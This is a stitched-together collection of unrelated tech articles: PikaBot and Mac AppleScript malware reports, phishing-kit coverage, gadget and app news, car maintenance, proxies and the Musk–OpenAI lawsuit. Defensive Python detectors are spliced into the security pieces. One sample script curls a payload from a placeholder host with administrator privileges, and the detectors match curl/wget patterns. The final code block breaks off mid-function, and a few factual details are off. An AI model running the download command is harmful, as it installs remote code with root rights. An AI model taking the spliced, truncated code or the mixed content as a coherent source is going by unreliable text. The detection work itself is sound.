PikaBot malware on the rise: What organizations need to know 


A new type of malware is being used by ransomware gangs in their attacks, and its name is PikaBot.

A relatively new trojan that emerged in early 2023, PikaBot is the apparent successor to the infamous QakBot (QBot) trojan that was shut down in August 2023. QBot was used by many ransomware gangs in the past for its versatile ability to facilitate initial access and deliver secondary payloads.

After QBot got shut down, there was a vacuum in the ransomware gang tool box—but with PikaBot, that’s beginning to change: last month we wrote about the first recorded instance of PikaBot being used by ransomware gangs, specifically Black Basta, in their attacks.

Let’s dig into how PikaBot works, how it’s distributed, how ransomware gangs use it in their attacks, and how to stop it with ThreatDown.

A closer look at PikaBot

To get a better idea of how PikaBot works, we need to first understand what a modular trojan is.

Simply put, a modular trojan is a type of malware designed to be flexible and extensible, allowing attackers to add or update its functionalities easily without needing to replace the whole malware.

The modular nature of trojans like QBot and PikaBot is what makes them so dangerous. Unlike simpler malware, PikaBot can execute arbitrary commands, download additional payloads, and inject malicious shellcode into legitimate processes running on a victim’s computer. Think of it like a backdoor that allows attackers to set up for the next stages of their attacks.

Once it’s installed onto a system, PikaBot has a whole host of ways to stay under the radar, evading detection by most conventional security tools through techniques like indirect system calls and advanced obfuscation methods.

How PikaBot is distributed

The distribution of PikaBot, like many other malicious loaders such as QBot and DarkGate, is heavily reliant on email spam campaigns. Even so, ThreatDown Intelligence researchers have seen PikaBot being delivered via malicious search ads as well (also known as “malvertising”).

PikaBot’s initial access campaigns are meticulously crafted, utilizing geolocalized spam emails that target specific countries. The emails often contain links to external SMB (Server Message Block) shares, which host malicious zip files.

SMB shares are network folders leveraging the SMB protocol—a network file sharing protocol designed for sharing files and printers across devices on a network. Attackers often use SMB shares to distribute malware. In this case, downloading and opening the hosted zip file results in PikaBot infection.

For example, consider the below phishing email containing a link to a zip file containing the PikaBot payload.

Source: ANY.RUN (Translation: I sent you some paperwork the other day. Did you get it?)

Once the recipient interacts with these emails by clicking on the link, they are taken to the SMB share hosting the malicious zip files.

Extracting a zip and double-clicking on the executable within it will install PikaBot.
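A detection sketch for the delivery chain described above, added here as an example and not taken from ThreatDown or ANY.RUN: it parses a message and flags links to zip files hosted on SMB servers outside the organisation. The internal suffix `.corp.example`, the internal address ranges and the sample message are assumptions constructed for illustration.

```python
import email
import html
import ipaddress
import re
from email import policy
from email.message import EmailMessage
from urllib.parse import unquote

# Assumptions: what counts as "internal" for this organisation.
INTERNAL_SUFFIXES = (".corp.example",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
ARCHIVE_EXTS = (".zip",)

# file://host/share/x.zip and \\host\share\x.zip both open an SMB share on Windows.
FILE_URL_RE = re.compile(r"file:/{2,}[^\s\"'<>]+", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[^\s\\/\"'<>]+\\[^\s\"'<>]+")


def split_host_path(link):
    """Normalise a file:// URL or UNC path to (host, path)."""
    s = link.replace("\\", "/")
    if s.lower().startswith("file:"):
        s = s[5:]
    host, _, path = s.lstrip("/").partition("/")
    return host.lower(), unquote(path)


def is_local(host):
    """True for file:///C:/... style links that never leave the machine."""
    return host in ("", "localhost") or re.fullmatch(r"[a-z]:", host) is not None


def is_external(host):
    """True when the SMB host is neither an internal address nor an internal name."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if "." not in host:          # single-label NetBIOS name, e.g. \\fileserver
            return False
        return not host.endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)


def smb_archive_links(raw_message):
    """Return sorted (host, path) pairs for archives on external SMB shares."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hits = set()
    for part in msg.walk():
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue
        body = html.unescape(part.get_content())
        for link in FILE_URL_RE.findall(body) + UNC_RE.findall(body):
            host, path = split_host_path(link.rstrip(".,;)"))
            if is_local(host):
                continue
            if path.lower().endswith(ARCHIVE_EXTS) and is_external(host):
                hits.add((host, path))
    return sorted(hits)


# Constructed sample message (documentation addresses and domains only).
SAMPLE_PLAIN = r"""I sent you some paperwork the other day. Did you get it?
Copy: \\198.51.100.20\share\scan.zip.
Handbook: \\files.corp.example\hr\handbook.zip
Report: https://example.com/report.zip
Local: file:///C:/temp/local.zip
"""
SAMPLE_HTML = ('<p>Documents: '
               '<a href="file://203.0.113.7/docs/Invoice_2291.zip">open</a></p>')


def build_sample():
    m = EmailMessage()
    m["From"] = "sender@example.net"
    m["To"] = "user@corp.example"
    m["Subject"] = "Documents"
    m.set_content(SAMPLE_PLAIN)
    m.add_alternative(SAMPLE_HTML, subtype="html")
    return m.as_string()


if __name__ == "__main__":
    for host, path in smb_archive_links(build_sample()):
        print(f"external SMB archive link: //{host}/{path}")
```

The same host test can back a mail-gateway rule or an egress alert on outbound TCP 445 to addresses outside the internal ranges.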

Source: ANY.RUN

How ransomware gangs use PikaBot

Ransomware gangs commonly use modular trojans like PikaBot for their attacks.

Before it was shut down, for example, QBot allowed ransomware gangs to seamlessly integrate various attack techniques into their operations, including stealing credentials, moving laterally across networks, and ultimately deploying ransomware or other malicious payloads.

PikaBot is being used by ransomware attackers in a similar way.

Once PikaBot has established a foothold in a network, it allows attackers to engage in a wide range of follow-up activities.

For example, researchers have noted affiliates of the Black Basta ransomware gang using PikaBot for encrypted communications with command and control (C&C) servers. PikaBot can also assist gangs in getting detailed information about infected systems, helping them tailor their ransomware for maximum impact.

How to stop PikaBot with ThreatDown

Besides preventing initial access through things such as a web content filter and phishing training, choosing an Endpoint Detection and Response (EDR) platform that automatically detects and quarantines threats like PikaBot is crucial.

However, given the constant evolution of malware, identifying dynamic threats like PikaBot boils down to two words: threat hunting.

At ThreatDown, we talk a lot about the importance of threat hunting for SMBs—and for good reason. Just consider the fact that, when an attacker breaches a network, they don’t attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like PikaBot that can quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

For example, as detailed in one case study, the ThreatDown Managed Detection and Response (MDR) team employed threat hunting techniques to uncover and neutralize a sophisticated QBot attack on a reputable oil and gas company. The team’s approach involved meticulously examining Indicators of Compromise (IoCs), analyzing network traffic, and scrutinizing unusual patterns of behavior within the company’s IT infrastructure, ultimately resulting in QBot’s discovery on the network and isolation of infected systems.

ThreatDown MDR workflow

Stop threats like PikaBot today

Want to learn more about how ThreatDown stops new threats like PikaBot? Fill out this form to speak with an expert and get a custom quote.



Watching videos on Google Drive is going to be much faster


If you are a Google Drive user, then you’ve likely tried to stream some of your saved videos using the platform. Well, using Google Drive to stream videos hasn’t been the best. Fortunately, Google Drive will use the DASH protocol when streaming videos, so the experience will be much better.

When streaming videos on Google Drive, the video player doesn’t take into account how fast or slow your internet connection is. This means that you will experience a lot of buffering if your connection isn’t the greatest. Video streaming platforms like YouTube, on the other hand, will raise or lower the resolution based on your connection speed. This is one thing that helps keep the streaming experience smooth.

  Google Drive will use the DASH protocol for streaming videos

If you are confused about what DASH is, it stands for Dynamic Adaptive Streaming over HTTP. This will automatically adjust the bit rate of the video you’re watching so that it can play better no matter how weak your connection is. Also, videos will start faster when you open them.

The introduction of DASH will make watching videos on Google Drive a much more streamlined experience. Google will enable DASH for new videos going forward. As for videos that already exist on the platform, it’ll be a while before you see DASH make it to them. Google plans to update existing videos on Drive by the end of the year. So, that’s 10 months we will have to wait.

Simplified navigation

Finding different content types on Google Drive is about to change a bit for the mobile app. Normally, when you are searching for files using the search bar, you will see a horizontally scrolling carousel of chips right under the search bar. These chips would all be specific types of files like documents, PDFs, images, videos, etc.

Well, in a future update, Google will move all of those file types into a drop-down menu. So, when you are in the search section, you will see three drop-down menus where the chips used to be. The first one is called “Type,” and it will show you all of the different document types. The second one is called “People,” and it will show you all of the contacts you’ve communicated with on Drive. The last drop-down menu is called “Modified,” and it will show you your most recently modified files.

Google Drive file type drop down

Google is currently rolling these features out to Drive, so you should expect them within the coming weeks.



Why European engineering requires unique maintenance techniques


European engineering is known for its precision and innovation, but it also requires specific maintenance routines. In the case of maintaining European cars, generic ways might not work well. In this blog post, we will take a closer look at the special maintenance methods European engineering needs.

Where Germanic auto design meets Italian craftsmanship, every European brand imposes a unique maintenance task. A European auto repair shop that focuses on European vehicles should have in-depth knowledge and equipment to meet these expectations.

Let’s take a tour of the European engineering world and why your auto repair shop must be fully equipped with the right skills to deal with these super machines.

Understanding European Engineering

The engineering in Europe is distinctive for its careful approach to details, consistent adherence to the design principles, and high standards of quality. It can either be the German automotive engineering that is famous for its precision and performance or the Swiss watchmaking that is highly regarded for its craftsmanship and precision. Both of them are identified with quality and reliability.

Unique Maintenance Challenges

Advanced Technology

European products, frequently being high-tech and complicated, require highly specialized knowledge and tools to maintain and repair. In the automotive industry, advanced electronic control units and high precision machinery used in manufacturing require workers to be updated with the latest developments in order to conduct maintenance effectively.

Precision Engineering

European engineering gives more emphasis on the design and manufacturing of parts with high precision, resulting in finely engineered components that need special attention. From high-tolerance engine parts to complexly calibrated sensors, these precision-engineered components might need to be dealt with carefully and even with great skill.

Specialized Materials

To keep European products competitive on the market, manufacturers use specialized materials that offer excellent performance, durability and low weight. Special maintenance procedures are required to ensure that these materials perform reliably and remain in service. Understanding the properties of these materials, whether that means selecting a suitable lubricant for titanium components or choosing an appropriate cleaning solution for carbon fiber body panels, is essential to their efficient maintenance.

Optimizing Performance

In Europe, the emphasis is placed on performance oriented design that can range from very high horsepower in sports cars to maximum accuracy of cutting machines. The ideal level of performance shall be continuously maintained by calibration, modification and adjustment in order to ensure that the machine operates as it should.

Effective Maintenance Strategies

Specialized Training

Technicians should be given specialized training in European engineering principles and technologies to guarantee their efficiency. Contents of the training courses should include the following components: advanced diagnostics, usage of special tools, and maintenance procedures that are specific to European-made products.

Access to OEM Resources

Networking with OEMs gives an opportunity to use technical documents, training materials, and specialized tools required for maintenance of products manufactured in Europe. OEM support lets technicians have access to the recent information and resources that are necessary for efficient maintenance and repairs.

Diagnostic Equipment

Investing in diagnostic equipment made for performing detailed diagnoses on European-made products considerably reduces the time it takes technicians to identify issues and perform the required diagnostic work. Diagnostic tools like scan tools, oscilloscopes, and diagnostic software have become an essential part of troubleshooting modern electronic systems and revealing hidden faults.

Preventive Maintenance Programs

Creating preventive maintenance programs that are specifically tuned to European-made product types reduces the likelihood of unexpected failures and costly downtime. Scheduled inspections, fluid changes, and component replacements based on manufacturers’ recommendations should be carried out to achieve the desired reliable performance.

Genuine Parts and Fluids

Using OEM (Original Equipment Manufacturer) parts and liquids as per the manufacturer’s specifications guarantees compatibility and performance consistency. Performance and reliability of European-made products are dependent on the criteria that they are engineered to meet.

Aftermarket components or fluids can alter the specifications, and thus void warranty. Using original components and fluids guarantees the integrity of the equipment and its service life.

Future Trends in European Engineering Maintenance

– The use of AI and machine learning for predictive maintenance.
– Adoption of digital twins and IoT devices for the purpose of real-time monitoring.
– Greater attention to sustainability for energy efficiency and waste minimization.
– Collaboration between engineers, data scientists, and maintenance professionals for new ideas.
– Shifting to reactive, data-driven maintenance strategies for efficiency, sustainability and global competitiveness.

Conclusion

Innovation, accuracy, and efficiency of European engineering are the highest in a broad spectrum of industries. Therefore, it requires a more detailed approach given the advanced technology, precise engineering, and specialized materials. The innovations aim at optimizing operations and reducing downtime, which in the end benefits an auto repair shop.

By understanding the specific maintenance problems that are inherent in European engineering, businesses are able to implement maintenance strategies effectively and ensure that their European-produced products operate optimally for a long time.



Malicious meeting invite fix targets Mac users


Cybercriminals are targeting Mac users interested in cryptocurrency opportunities with fake calendar invites. During the attacks the criminals will send a link supposedly to add a meeting to the target’s calendar. In reality the link runs a script to install Mac malware on the target’s machine.

Cybersecurity expert Brian Krebs investigated and flagged the issue.

Scammers, impersonating cryptocurrency investors, are active on Telegram channels to get interested people to attend a meeting about a future partnership.

One of those investors called Signum Capital tweeted a warning on X in January that one of their team members was being impersonated on Telegram and sending out invites by direct message (DM).

The criminals reach out to targets by DM on Telegram and ask if they have an interest in hearing more about the opportunity in a call or meeting. If they show interest they will be sent a fabricated invitation for a meeting. When the time comes to join the meeting the invitation link doesn’t work. The scammers tell the victim it’s a known issue, caused by a regional access restriction, which can be solved by running a script.

We asked Malwarebytes Director of Core Technology and resident Apple expert Thomas Reed to look at this method. This isn’t the first time criminals have used scripts to compromise users, he told us.

“AppleScript has been used against Mac users with moderate frequency by malware creators over the years. It has the advantage of being very easy to write, and if compiled, is also extremely difficult to reverse engineer.”

According to Reed, AppleScripts can be provided in a few different forms. One is a simple .scpt file that opens in Apple’s Script Editor app. This has a few drawbacks for criminals: A victim would need to click something within Script Editor to run the script, and they would be able to see the code, which might be a problem because AppleScript tends to be more human readable than most other scripts. However, there are ways to obfuscate what the code is doing, and many users won’t bother to read it anyway.

Another option is an AppleScript applet. This is something that acts like a normal Mac app. It contains a basic AppleScript executable and the script to be run. In this form, the script can be code signed, notarized, given an icon, and otherwise made to appear more trustworthy. The code could be pretty bland, and unlikely to trigger any kind of detection from Apple’s notarization process, but could download and execute something less trustworthy.

Scripts have another advantage for criminals, Reed warned.

“AppleScripts also have the advantage of being able to very easily get administrator permissions.”

A script that attempts to run a command with administrator privileges will ask users to authenticate, triggering a password dialog.

If the user enters their password, the script doesn’t actually get to see it, but everything else the script attempts to do “with administrator privileges” will successfully run as root without further authentication. This makes it very easy for the script to show a standard authentication request dialog and trick the user into giving root permissions.

“So, in summary, AppleScript can be quite effective for writing malware. In fact, some malware has been written exclusively – or almost exclusively – in AppleScript, such as OSX.DubRobber or OSX.OSAMiner.”

In this case, the script was a simple AppleScript that downloaded and executed a macOS-oriented Trojan. The nature of the Trojan is unknown, but it certainly won’t surprise anyone if it turns out it was a banking Trojan that specializes in stealing cryptocurrencies.
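A triage sketch for the behaviour described above, added here as an example and not taken from Malwarebytes or Thomas Reed: it scans AppleScript source text for `do shell script` statements and rates those that run `with administrator privileges`, fetch remote content, or both. The severity labels, the fetch heuristics and the sample script are assumptions constructed for illustration.

```python
import re

# AppleScript continues a statement on the next line with the "¬" character.
CONTINUATION_RE = re.compile(r"¬[ \t]*\r?\n[ \t]*")
STATEMENT_RE = re.compile(r"\bdo\s+shell\s+script\b([^\n]*)", re.IGNORECASE)
STRING_RE = re.compile(r'"(?:[^"\\]|\\.)*"')
ADMIN_RE = re.compile(r"\bwith\s+administrator\s+privileges\b", re.IGNORECASE)
# Heuristic (assumption): a download tool or a URL inside the statement.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b|https?://", re.IGNORECASE)


def triage_applescript(source):
    """Return one finding per `do shell script` statement in the source text."""
    logical = CONTINUATION_RE.sub(" ", source)
    findings = []
    for line in logical.splitlines():
        stripped = line.strip()
        if stripped.startswith(("--", "#")):      # AppleScript comment lines
            continue
        match = STATEMENT_RE.search(stripped)
        if not match:
            continue
        args = match.group(1)
        # Blank out string literals so the phrase only counts as a real clause.
        elevated = bool(ADMIN_RE.search(STRING_RE.sub('""', args)))
        fetches = bool(FETCH_RE.search(args))
        if elevated and fetches:
            severity = "high"      # remote content handled with root rights
        elif elevated or fetches:
            severity = "review"    # e.g. command held in a variable, or a plain fetch
        else:
            severity = "info"
        findings.append({
            "statement": stripped,
            "elevated": elevated,
            "fetches": fetches,
            "severity": severity,
        })
    return findings


# Constructed sample script (placeholder domain, not from the campaign).
SAMPLE_SCRIPT = '''-- constructed sample for illustration
display dialog "Applying regional access fix..."
do shell script "curl -s https://meeting-support.example.invalid/fix -o /tmp/fix" ¬
    with administrator privileges
do shell script "sw_vers -productVersion"
set cmd to "echo done"
do shell script cmd with administrator privileges
'''

if __name__ == "__main__":
    for finding in triage_applescript(SAMPLE_SCRIPT):
        print(finding["severity"], "|", finding["statement"])
```

The scanner needs source text: a compiled .scpt has to be converted first (macOS ships `osadecompile`), and run-only compiled scripts cannot be decompiled that way.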

Recognizing the scam

To avoid falling victim to these scammers, it’s good to know a few of their tactics.

  • Targets are approached by DM on Telegram.
  • Topics are cryptocurrency investment opportunities.
  • The scammers have a preference for the Calendly scheduling platform.
  • A fake “regional access restriction” creates a sense of last minute urgency.
  • The script had the .scpt (AppleScript) extension.
  • The script was hosted on a domain that pretended to be a meeting support site.

The presence of Mac malware is unfortunately still underestimated, but you can find protection by Malwarebytes for Mac and protect Mac endpoints in your environment by ThreatDown solutions.



WhatsApp could add icons to the three-dot menu


When it comes to app UI design, sometimes, it’s the little things that really enhance the experience. According to a new report, it appears that one of the most popular messaging apps might actually make using it a little bit easier. After news of testing third-party chats, WhatsApp could add icons to the three-dot menu in the near future.

Since we’re talking about a feature discovered in the WhatsApp beta, you will want to take this news with a grain of salt. The company is currently testing this new addition, but it’s not a guarantee that it will push it to the masses. However, since this feature is a very small addition to the interface, it seems likely that WhatsApp will follow through and push this feature.

WhatsApp could add icons to the three-dot menu

When you are using WhatsApp, and you tap on the three-dot menu at the top right-hand corner of the screen when in a chat, you’ll see the overflow menu. If you are a veteran WhatsApp user, then you’ve seen this menu a thousand times. It should be pretty intuitive for you.

However, the company wants to make it even more intuitive. As discovered in the latest beta version of the app, version 2.24.5.19 of the Android beta, the three-dot menu could have little icons next to all of the items.

In the screenshot below, we see the View Contact, Report, Block, Search, Unmute Notifications, and Disappearing Messages in the three-dot menu. Each of these items has a little icon next to it. It’s nothing spectacular, but it does add a nice little visual flair to the interface.

WhatsApp icons three dot menu

As for when we should expect to see this feature roll out to the masses, that’s anyone’s guess. Since this is a pretty minor change, we should hopefully see it rather soon. If you have the latest version of the app, you might see it. However, that’s not a guarantee that you will. If you don’t see it, then you’re going to have to wait like the rest of us.



March 2024 Windows 11 update brings some major improvements


Microsoft is rolling out a slew of new features to Windows 11 with the March 2024 update, including improved Copilot, Widgets, and more. This means that as soon as you install the new update, you’ll get access to support for plugins, which was for a long time exclusive to Copilot web. Plus, a whole bunch of other features are landing.

Windows 11 is smarter than ever, thanks to improvements in Copilot and others

Before you move ahead, ensure that automatic updates are enabled by default in Windows’ Update settings. Most features should be available with the March 2024 optional non-security preview release update for Windows 11.

First up, Copilot is getting smarter. You can control more settings directly from Copilot, like toggling battery saver mode or other features. Plus, Copilot can show you available Wi-Fi networks and help manage storage space.

The built-in Photos app is getting a boost with a new Generative Erase feature. Say goodbye to unwanted objects in your photos with just a few clicks. Clipchamp, Microsoft’s video editor, is also leveling up with a tool to remove those awkward silences from your videos.

Widgets are getting some love too. You can now disable the pesky “Microsoft Start” feed. For reference, you could push a Google News plugin in the Widgets board to fetch news content instead of relying on the default option.

For multitaskers, Snap layouts are getting smarter. Windows 11 will remember your frequently used apps and suggest layouts for you, making it easier to organize your workspace.

If you’re a fan of Windows-powered tablets with styluses, you’ll love the new ability to write directly into text boxes across the OS. It works across apps such as Photos, Paint, WhatsApp and others. You may expect more apps to support this with future updates.

Casting features are also getting refined, with notifications for casting suggestions and smoother connections with nearby displays. Moreover, sharing content between devices could be a smoother and faster process with more updates to Phone Link. It now lets you access photos and even use your phone as a webcam, similar to Mac setups.



How Static Proxies Transform Online Experience


Just as surfing the web is better with a stable internet connection, completing tasks like web scraping or bulk purchasing is more efficient with a static IP address. But before you rush to buy static proxies, you should know how exactly they improve your tasks.

You are not better off with a static IP in every scenario. This article will explain how they work, why it matters for proxies, and when you should choose them. Let’s start with some basics.

Static and dynamic IPs

IP addresses are unique identifiers that signal who you are for each web server in contact. The abbreviation IP stands for the Internet Protocol. Simply put, it’s a set of rules that govern how online communications are handled. As per these rules, each device on the internet must have an IP address.

Smartphones, tablets, laptops, TVs, routers, and even smart fridges have an IP address. A private IP address such as this one – 192.0.2.1 (IPv4) might be assigned by your network router to a device connecting online through it. However, IP addresses, especially public ones, might also include letters with the newest IPv6 standard.

Naming conventions aside, the most important distinction for us here is between static and dynamic IP addresses.

  • A static IP address does not change and is assigned to a specific device permanently. Multiple network sessions can be done with the same IP address without changing.
  • Best for: Static IPs are great for hosting websites, remote access points, or other advanced web applications. They are usually faster when downloading or uploading large data packets.
  • A dynamic IP address changes over time. It can happen due to the network router assigning a different address each time you connect or the service provider switching IPs to optimize performance. 
  • Best for: Since the IP changes, tracking or infiltrating such a home network is more difficult. Dynamic IPs also do not require much configuration or know-how from the user. In most cases, it’s done automatically by the Dynamic Host Configuration Protocol (DHCP) server.

Both types of IP addresses show your approximate location, but dynamic ones vary the IPs with ones from the same approximate location. That’s why static IPs are more accurate for location targeting. Web servers can pinpoint your location better when you connect from the same IP each time. These differences are crucial for running proxy servers.

Why does IP type matter for proxies?

Proxy servers are devices configured to act as intermediaries between the internet and other devices. For example, if you set up a device in Germany to act as your proxy, you could use its IP address and location to connect from Germany.

Of course, setting up a proxy device to route your internet requests requires a lot of resources and know-how. It’s easier to simply purchase it from a provider that can offer a proxy type suitable for you. The main proxy types are distinguished by IP address source.

  • Residential proxies – Residential proxies are sourced from ordinary homes. In most cases, providers pay people to run software that enables their devices (laptops, for example) to act as a proxy gateway for others. It’s a type that will arouse the least suspicion from web servers, albeit it can be slow at times.
  • Mobile proxies – Mobile proxies are sourced from devices that use mobile internet. Smartphones, tablets, or other similar devices are used to connect to the internet and run software, allowing them to act as proxy servers. Mobile connections may not be fast, but they are often the only option to access mobile-specific services.
  • Datacenter proxies – Datacenter proxies stand out for their affordability and performance capabilities. Unlike the other two types, they are created in special data centers that use commercial internet and professional equipment. One good server can host hundreds of data centre IPs virtually, which is the source of their benefits, but also makes it vulnerable to IP blocks and other restrictions.

Each of these proxy types changes their functioning when used as static or as dynamic. Mobile proxies are rarely static. To ensure support for devices on the move, mobile internet providers use dynamic IPs, so mobile proxy infrastructure cannot hold such IPs unchanging for a long time.

Residential IPs are best when used as static proxies. Since a good residential connection is difficult to come by, you will likely want your IP address to stay for as long as you want. Providers usually sell them as such or, at least, provide an option for sticky sessions to hold one IP for longer.

Dynamic residential proxies aren’t the best choice because you are likely to lose a lot of performance. A household connection is simply not fast enough to cover for the loss of speed when changing IP addresses.

Datacenter proxies, being much faster, are better as dynamic (also called rotating) proxies. Changing datacenter IPs frequently is proven to improve their legitimacy and help avoid IP bans. Only in rare cases might you need a static data centre IP, but a static residential IP can transform how you use the internet.

Static proxies: top use cases

  • Browsing the internet anonymously is easy with static proxies. You only need to enter your proxy credentials in your operating system or web browser. Using one IP for a longer period ensures smooth performance and fewer suspicions from web servers.
  • Bulk purchasing might require you to keep one IP address for a longer period. Static proxies will enable you to keep the same IP address throughout the entire checkout process. 
  • Web scraping is a process of collecting online data automatically with bots. While dynamic proxies are used here as well, static proxies may be necessary to ensure a stable connection with the target server.

Wrapping up

Although static IP addresses might be easier to track, sometimes you want to shield your identity consistently. Static residential proxies are best for such a purpose. From simple anonymous browsing to advanced web scraping projects, static proxies will transform how you use the internet.


The Google Play Store is getting a new design for its bottom sheet


The Google Play Store has a pretty modern look that’s consistent with Google’s design language. However, there are still a few elements of the UI that could use an update. Well, according to a new report, the bottom sheet in the Google Play Store will get a new design.

This revamp comes right after the same was done for Google Maps. Currently, if you try to install an app from the discovery feed or if you are prompted to update an app, you will see a little panel slide up from the bottom of the screen. This is the bottom sheet, and it gives you a few quick options that you can perform right then and there.

The bottom sheet UI doesn’t quite reflect the most modern Material You aesthetic. Sure, it has rounded buttons, but the corners of the panel itself are still flat, which is something that Google is looking to change with its apps. The rounded corners are in, and they’re what Google wants for its ecosystem of apps.

Google Play Store is getting a revamp of its bottom sheet

Right now, Google is in the process of changing up the way its bottom sheet looks. This is going to give it a more modern look. Looking at the screenshots below, we see that the panel will have larger buttons. Also, the corners of the panel will be very rounded. Lastly, you will see a little bar at the top of the sheet that will let you drag it up to have it fill the screen. To get rid of it, you would swipe downward.

This was discovered in Google Play Store version 39.8. However, the latest stable version of the Google Play Store is version 39.7. So, it’s going to be a little wait before this change makes it to the public. When it arrives, it will make using the Google Play Store a little bit better.



Elon Musk is suing OpenAI for not developing ‘Open’ AI


Elon Musk is in the process of suing OpenAI because he believes that the company is not living up to the philosophy of developing open artificial intelligence for humanity. In the case, he marked the company CEO Sam Altman and President Gregory Brockman as defendants. While Microsoft has been mentioned a lot in the case, the company was not indicated as a defendant.

Why is Elon Musk suing OpenAI?

This case came a little bit out of left field. You would expect Elon Musk to sue OpenAI if the company was scraping data from X or if ChatGPT generated mean comments about the billionaire. However, that’s not the case. In fact, it appears that Musk is suing OpenAI for being closed off. He believes that OpenAI’s original vision was to craft open-source artificial intelligence for the betterment of humanity. He claims that OpenAI’s current state constitutes a breach of contract, breach of fiduciary duties, and unfair business practices.

“OpenAI, Inc. has been transformed into a closed-source de facto subsidiary of the largest technology company in the world: Microsoft,” Elon Musk says in his suit. “Under its new board, it is not just developing but is actually refining an AGI to maximize profits for Microsoft, rather than for the benefit of humanity.”

Even though Microsoft is not a defendant, the company is brought up a lot. Musk brings into question OpenAI’s true motives for developing artificial intelligence. He says that, rather than being an open-source non-profit company developing AI technology for humanity, it’s basically become a company developing AI just to line Microsoft’s pockets.

Microsoft’s role

A big part of the case has to do with Microsoft’s influence over OpenAI. Microsoft is one of the biggest companies in the world. Elon Musk claims that Microsoft’s motives are only to maximize profits. He feels that this has skewed OpenAI’s endeavors. So, instead of developing artificial intelligence tools to help push humanity forward, the company is, allegedly, being pushed to be a profit machine for Microsoft.

The company has an observer seat on OpenAI’s nonprofit board. While the company does have a seat on the board, Microsoft does not have any control over company decisions. Also, Microsoft gained exclusive rights to OpenAI’s GPT-3 technology back in 2020, a full two years before the generative AI explosion.

The board

In the suit, one thing that Elon Musk brings up is the fact that the current non-profit board members are no longer scientists. Up until late last year, OpenAI’s nonprofit board consisted of AI researchers and scientists. However, the board was replaced after the firing and subsequent rehiring of Sam Altman in November 2023. Musk says that the board members now consist of people who are driven by profit rather than the development of AI technology for all.

Musk says, “OpenAI, Inc.’s once carefully crafted non-profit structure was replaced by a purely profit-driven CEO and a Board with inferior technical expertise in AGI and AI public policy. The board now has an observer seat reserved solely for Microsoft.”

OpenAI isn’t so “Open”

Another thing that Elon Musk complains about is the fact that OpenAI isn’t developing open-source artificial intelligence. Rather, the code powering ChatGPT is behind closed doors, known only to OpenAI. He also says that Microsoft could have insight into OpenAI’s internal details. In the case, Elon Musk wants OpenAI to make its source code public. So, if Elon Musk ends up winning the case, that could be a possibility. Suddenly making its code open source would be a huge ask for OpenAI. Also, if that were to happen, we’re pretty certain that both companies, OpenAI and Microsoft, would push back hard.

Details are still scarce

This lawsuit was filed on Friday, March 1st, so it’s still fresh. We’re not sure if Musk will be able to take this to court. As of now, neither Elon Musk nor OpenAI has commented on the lawsuit.



CryptoChameleon Phishing Scam Targets Crypto Users and FCC Employees


So far, the CryptoChameleon phishing scam has successfully phished over 100 victims, with many still active.

Lookout has discovered a multi-pronged phishing campaign, dubbed “CryptoChameleon,” that mimics legitimate login pages for cryptocurrency platforms and the Federal Communications Commission (FCC) via mobile devices.

The kit uses carbon copies of SSO pages and phishing via email, SMS, and voice to trick victims into sharing sensitive information, including usernames, passwords, password reset URLs, and photo IDs, mainly targeting US-based users. 

Researchers detected the phishing kit when they found a suspicious new domain registration, fcc-okta[.]com. The phishing kit targets cryptocurrency platforms and SSO services and can impersonate various company brands, with Coinbase being the most frequently targeted service. Researchers identified other websites using the kit, with most using a subdomain of official-server[.]com as their C2.

The attack, as reported by Lookout in its blog post, has successfully phished over 100 victims, with many still active. Notable files in the kit include the C2 server URL, client-side logic, and style sheets. Cybercriminals use RetnNet hosting for most sites.

Victims have to first complete a captcha using hCaptcha, which prevents automated analysis tools from identifying the site and creates a sense of credibility for the site. Once done, a login page mimicking the FCC’s official Okta page is launched, where victims enter their credentials and wait for a login or MFA token. 

The attacker monitors this page via an administrative console and can select where to send the victim’s information. They try to log in using the victim’s credentials in real time and redirect the victim to the appropriate page based on the information the MFA service requests.

The phishing page could be customized by providing the victim’s phone number and choosing between a 6- or 7-digit code.

Additionally, victims are lured through phone calls, emails, and text messages. Phishing emails are disguised as legitimate messages from cryptocurrency platforms or the FCC and contain malicious links, while SMS messages resemble legitimate notifications.

Furthermore, voice phishing involves impersonating representatives to trick victims into revealing confidential information over the phone. Most legitimate victim data came from iOS and Android devices, indicating the attack is primarily targeted at mobile devices.

A phishing page masquerading as the FCC, along with a malicious text message containing a phishing link, was discovered by attackers (Credit: Lookout)

Researchers suspect that Scattered Spider could be behind this attack because Scattered Spider also impersonates Okta, registers domains using the companyname-okta.com pattern, and uses homoglyph swapping. However, the phishing kit has significantly different capabilities and C2 infrastructure.
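For defenders, the two naming tricks described above (a brand name joined to an SSO keyword, and homoglyph swaps) can be screened for in a feed of newly registered domains. The following is an added example, not code from Lookout or the original article; the brand list, keyword list, owned-domain allowlist, confusables table and the `.example` feed are all assumptions constructed for illustration.

```python
import unicodedata

# Assumptions for this sketch: brands to protect, SSO keywords to pair them
# with, and the domains the organisation really owns.
BRANDS = {"fcc", "coinbase"}
SSO_KEYWORDS = {"okta", "sso", "login"}
OWNED = {"fcc.gov", "coinbase.com"}
# Deliberately small confusables table (digits and a few Cyrillic letters).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0441": "c", "\u0456": "i",
})

def skeleton(token):
    """Fold a token to the ASCII string it visually imitates."""
    return unicodedata.normalize("NFKC", token).lower().translate(CONFUSABLES)

def classify(domain):
    """Return the sorted reasons a newly registered domain looks suspicious."""
    try:
        domain = domain.encode("ascii").decode("idna")  # xn-- labels to Unicode
    except UnicodeError:
        pass  # already Unicode, or not valid punycode
    domain = domain.lower().rstrip(".")
    if any(domain == d or domain.endswith("." + d) for d in OWNED):
        return []
    # Simplification: treat the last label as the TLD and ignore it.
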